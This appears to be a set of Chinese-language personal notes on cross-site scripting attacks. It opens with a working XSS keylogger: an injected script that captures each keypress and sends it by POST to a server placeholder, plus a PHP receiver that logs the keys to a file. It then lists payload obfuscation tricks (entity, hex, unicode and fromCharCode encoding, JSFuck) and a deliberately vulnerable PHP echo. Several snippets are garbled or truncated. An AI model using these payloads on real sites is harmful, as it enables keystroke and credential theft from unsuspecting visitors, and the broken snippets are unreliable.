xss键盘记录
xss插入代码
<script type="text/javascript" src="./log.js"></script>
log.js
document.onkeypress=function(evt){
evt=evt ? evt : window.event;
key=String.fromCharCode(evt.keyCode ? evt.keyCode : evt.charCode);
if(key){
var http=new XMLHttpRequest();
var param=encodeURI(key);
http.open("POST","http://本地服务器IP/keylog/log.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
log.php
<?php
$key=$_POST['key'];
$logfile='key.txt';
$fp=fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
>
xss编码方式
html实体编码
HTML解析器能识别在文本里和参数或属性值里的实体编码
无法写进<script>标签内容,只能配合事件触发
<img src=x one rror=alert(1)>
十进制:ale
十六进制:()
进制编码
<script>eval(String.fromCharCode())</script>
<img src=x one rror=eval(String.fromCharCode())>
十进制:97,108,22
十六进制:\x61\x6c\x65
unicode:\u0061\u006c\u0065
url编码
<?php $xss=$_GET['xss'];echo $xss;?>
jsfuck
<img src=x one rror=js编码>
<script>js编码</script>
<script>function("alert(1)")()</script>